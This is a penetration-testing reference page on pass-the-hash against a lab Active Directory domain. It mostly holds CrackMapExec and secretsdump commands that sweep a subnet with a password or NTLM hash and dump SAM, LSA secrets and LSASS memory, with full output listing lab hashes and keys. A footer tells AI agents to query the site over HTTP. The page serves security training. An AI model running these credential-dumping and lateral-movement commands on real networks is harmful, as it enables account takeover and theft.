# Pass the Hash We can use the password or hash to move literally in the network. {% embed url="" %} Complete Tutorial {% endembed %} ### How to get the hash #### Metasploit Hashdump
#### Impacket
### Crackmapexec PTH We can pass a password and sweep the subnet ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -p Password1 SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False) SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 192.168.145.138 445 HYDRA-DC [+] MARVEL.local\fcastle:Password1 SMB 192.168.145.140 445 SPIDERMAN [+] MARVEL.local\fcastle:Password1 (Pwn3d!) SMB 192.168.145.139 445 THEPUNISHER [+] MARVEL.local\fcastle:Password1 (Pwn3d!) ``` or We can also pass a hash (Works only on NTLM v1 . V2 can be relayed not passed)

add --local-auth as we are authenticating locally

### Capabilities of crackmapexec ``` crackmapexec smb -L (opens the capabilities list it down) ``` We can dump SAM, LSA or smbshares ``` crackmapexec smb -u Administrator -p --sam --local-auth crackmapexec smb -u Administrator -p --lsa --local-auth crackmapexec smb -u Administrator -p --shares --local-auth ``` ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --sam SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False) SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False) SMB 192.168.145.138 445 HYDRA-DC [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b SMB 192.168.145.140 445 SPIDERMAN [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.139 445 THEPUNISHER [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.140 445 SPIDERMAN [+] Dumping SAM hashes SMB 192.168.145.139 445 THEPUNISHER [+] Dumping SAM hashes SMB 192.168.145.140 445 SPIDERMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: SMB 192.168.145.140 445 SPIDERMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.145.139 445 THEPUNISHER Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: SMB 192.168.145.139 445 THEPUNISHER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.145.140 445 SPIDERMAN DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.145.140 445 SPIDERMAN WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76::: SMB 192.168.145.139 445 THEPUNISHER DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.145.140 445 SPIDERMAN peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: SMB 192.168.145.140 445 SPIDERMAN [+] Added 5 SAM hashes to the database SMB 192.168.145.139 445 THEPUNISHER WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb::: SMB 192.168.145.139 445 THEPUNISHER frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: SMB 192.168.145.139 445 THEPUNISHER [+] Added 5 SAM hashes to the database ``` ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --shares SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False) SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False) SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False) SMB 192.168.145.139 445 THEPUNISHER [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.138 445 HYDRA-DC [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE SMB 192.168.145.140 445 SPIDERMAN [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.139 445 THEPUNISHER [+] Enumerated shares SMB 192.168.145.139 445 THEPUNISHER Share Permissions Remark SMB 192.168.145.139 445 THEPUNISHER ----- ----------- ------ SMB 192.168.145.139 445 THEPUNISHER ADMIN$ READ,WRITE Remote Admin SMB 192.168.145.139 445 THEPUNISHER C$ READ,WRITE Default share SMB 192.168.145.139 445 THEPUNISHER IPC$ READ Remote IPC SMB 192.168.145.140 445 SPIDERMAN [+] Enumerated shares SMB 192.168.145.140 445 SPIDERMAN Share Permissions Remark SMB 192.168.145.140 445 SPIDERMAN ----- ----------- ------ SMB 192.168.145.140 445 SPIDERMAN ADMIN$ READ,WRITE Remote Admin SMB 192.168.145.140 445 SPIDERMAN C$ READ,WRITE Default share SMB 192.168.145.140 445 SPIDERMAN IPC$ READ Remote IPC ``` #### Dumping Memory ``` crackmapexec smb -u -p -M lsassy -o METHOD=nanodump ``` #### 🔍 `--lsa` in CrackMapExec **Purpose:**\ Dumps **LSA secrets** from the **registry**, such as: * Stored service account passwords * Cached domain credentials * Auto-logon passwords * Scheduled task creds **Mechanism:**\ This is a **registry read**, not a memory dump. It does **not touch LSASS** directly. **Command Example:** ```bash bashCopyEditcrackmapexec smb -u -p --lsa ``` **Requires:** * Administrator privileges * Access to registry remotely **Output Example:** ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --lsa SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False) SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False) SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False) SMB 192.168.145.139 445 THEPUNISHER [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.138 445 HYDRA-DC [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE SMB 192.168.145.140 445 SPIDERMAN [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.139 445 THEPUNISHER [+] Dumping LSA secrets SMB 192.168.145.140 445 SPIDERMAN [+] Dumping LSA secrets SMB 192.168.145.139 445 THEPUNISHER MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23) SMB 192.168.145.139 445 THEPUNISHER MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02) SMB 192.168.145.140 445 SPIDERMAN MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:53:16) SMB 192.168.145.140 445 SPIDERMAN MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-16 06:49:57) SMB 192.168.145.140 445 SPIDERMAN MARVEL.LOCAL/pparker:$DCC2$10240#pparker#9f28ff35b303d014c9e85e35ab47d019: (2025-05-16 07:00:00) SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4 SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:aes256-cts-hmac-sha1-96:c131c1e90e95f1b416556a534b8cb0ee62dd96cc145c46b0eb6d11f73eb1a5d1 SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4 SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00 SMB 192.168.145.139 445 THEPUNISHER MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0::: SMB 192.168.145.139 445 THEPUNISHER dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2 dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28 SMB 192.168.145.139 445 THEPUNISHER NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063 SMB 192.168.145.139 445 THEPUNISHER [+] Dumped 9 LSA secrets to /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.secrets and /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.cached SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:aes128-cts-hmac-sha1-96:8234a83db77e524d118254a404aa48b2 SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:des-cbc-md5:61c2c129effe1ab3 SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:plain_password_hex:a2c5160c8c59c6a5e7ef3f304d110706f4365b36debbb27afdd4e37eadabe6443cb79031a728372c0d53558b1275186299aa74515f8c2f839527b86a1e3ef3e7d36273ab39c3117fe8d8c5acf02121b8cb5731bc8b99ec7752fc9bcfd8d78d4886ab65e6596a5cc60f9f86b5eeccdcddc7f5427ded633d50590f5bb16bb24d5ebaae02fc03afad34c6ec421293c3485d59271a713c1f008d4dbd889166d642b89fd6922404566532d775cd5a25a91d770fb8cbf4eca57c45e82b0b05fa33825e5fc47915705f187895da756590e30b45fefb4a348fc33bad9efec57e07c537f7d93689582c4be10f8218dc05b7980a03 SMB 192.168.145.140 445 SPIDERMAN MARVEL\SPIDERMAN$:aad3b435b51404eeaad3b435b51404ee:8e5314ef4d8a661d84f21118e80ecc9a::: SMB 192.168.145.140 445 SPIDERMAN dpapi_machinekey:0x6380f87fdc42b92f622c31e7145a2fab193d5341 dpapi_userkey:0x4214531dfc2db4013de58ed96a7b088c7fbbb6e9 SMB 192.168.145.140 445 SPIDERMAN NL$KM:b47d88cd15dd2f727f1e5dbbb6086ac5085d53578924e84553154bf44d1483a6a877696579c58b9be2d2adfc665199da58447bb258affaa8c543903649ee4f4d SMB 192.168.145.140 445 SPIDERMAN [+] Dumped 10 LSA secrets to /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.secrets and /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.cached ``` *** #### 🧠 `-M lsassy` Module **Purpose:**\ Dumps **live credentials from LSASS memory**, including: * Cleartext passwords * NTLM hashes * Kerberos tickets **Mechanism:**\ Runs a **memory dump** using a method like `procdump`, `comsvcs`, or `nanodump`, then parses it using `lsassy`. **Command Example:** ```bash bashCopyEditcrackmapexec smb -u -p -M lsassy ``` **Requires:** * Administrator privileges * Ability to execute dump remotely * AV/EDR may block it **Output Example:** ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth -M lsassy SMB 192.168.145.138 445 HYDRA-DC [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False) SMB 192.168.145.139 445 THEPUNISHER [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False) SMB 192.168.145.140 445 SPIDERMAN [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False) SMB 192.168.145.138 445 HYDRA-DC [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE SMB 192.168.145.139 445 THEPUNISHER [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) SMB 192.168.145.140 445 SPIDERMAN [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!) ``` ### CrackMapExec database Keeps record of all cracked user accounts ``` ┌──(kali㉿kali)-[~] └─$ cmedb cmedb (default)(smb) > creds +Credentials---------+-----------+-------------+--------------------+-------------------------------------------------------------------+ | CredID | Admin On | CredType | Domain | UserName | Password | +--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+ | 1 | 2 Host(s) | plaintext | MARVEL | fcastle | Password1 | | 2 | 0 Host(s) | hash | THEPUNISHER | Administrator | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b | | 3 | 0 Host(s) | hash | SPIDERMAN | Administrator | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b | | 4 | 0 Host(s) | hash | THEPUNISHER | Guest | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 | | 5 | 0 Host(s) | hash | SPIDERMAN | Guest | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 | | 6 | 0 Host(s) | hash | THEPUNISHER | DefaultAccount | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 | | 7 | 0 Host(s) | hash | SPIDERMAN | DefaultAccount | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 | | 8 | 0 Host(s) | hash | THEPUNISHER | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb | | 9 | 0 Host(s) | hash | SPIDERMAN | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76 | | 10 | 0 Host(s) | hash | THEPUNISHER | frankcastle | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b | | 11 | 0 Host(s) | hash | SPIDERMAN | peterparker | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b | | 12 | 2 Host(s) | hash | MARVEL | fcastle | 64f12cddaa88057e06a81b54e73b949b | +--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+ ``` ### Dumping Hashes #### Secrets Dump Dumps SAM as well as other secrets from registry 
impacket-secretsdump 'MARVEL.local/fcastle:Password1@192.168.145.139'
#### Secrets Dump from Hash ``` ┌──(kali㉿kali)-[~] └─$ impacket-secretsdump 'MARVEL.local/fcastle:Password1@192.168.145.139' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb::: frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: [*] Dumping cached domain logon information (domain/username:hash) MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23) MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02) [*] Dumping LSA Secrets [*] $MACHINE.ACC MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4 MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4 MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00 MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0::: [*] DPAPI_SYSTEM dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2 dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28 [*] NL$KM 0000 09 9F C6 F6 60 EF 09 3E 30 CC 5B AA C7 AC 5A FB ....`..>0.[...Z. 0010 CA 61 47 50 2D 62 B1 36 D6 59 69 2F 82 CB 81 DE .aGP-b.6.Yi/.... 0020 D8 20 BF 99 BA 90 0C 47 10 9E 8E CB F5 01 E2 F0 . .....G........ 0030 0C 9C FC 1A BF AD 66 7B 03 11 DA A4 DF CD 60 63 ......f{......`c NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063 [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry ```
### Pass the Hash with Mimikatz
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.cavementech.com/pentesting-quick-reference/active-directory/post-compromise/pass-attacks/pass-the-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.